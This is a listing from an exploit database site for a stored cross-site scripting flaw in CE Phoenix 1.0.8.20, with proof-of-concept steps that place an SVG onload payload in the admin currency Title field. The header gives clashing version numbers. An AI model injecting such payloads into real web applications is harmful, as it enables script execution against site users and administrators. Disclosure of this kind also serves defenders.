[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

CE Phoenix Version 1.0.8.20 - Stored XSS Vulnerability

Author
tmrswrr
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-39608
Category
web applications
Date add
13-05-2024
Platform
php
# Exploit Title: CE Phoenix Version 1.0.8.20  - Stored XSS
# Exploit Author: tmrswrr
# Category : Webapps
# Vendor Homepage: https://phoenixcart.org/
# Version: v3.0.1
# Tested on: https://www.softaculous.com/apps/ecommerce/CE_Phoenix

## POC:

1-Login admin panel , go to this url : https://demos6.softaculous.com/CE_Phoenixx3r6jqi4kl/admin/currencies.php
2-Click edit and write in Title field your payload : <sVg/onLy=1 onLoaD=confirm(1)//
3-Save it and go to this url : https://demos6.softaculous.com/CE_Phoenixx3r6jqi4kl/admin/currencies.php
4-You will be see alert button

#  0day.today [2024-07-01]  #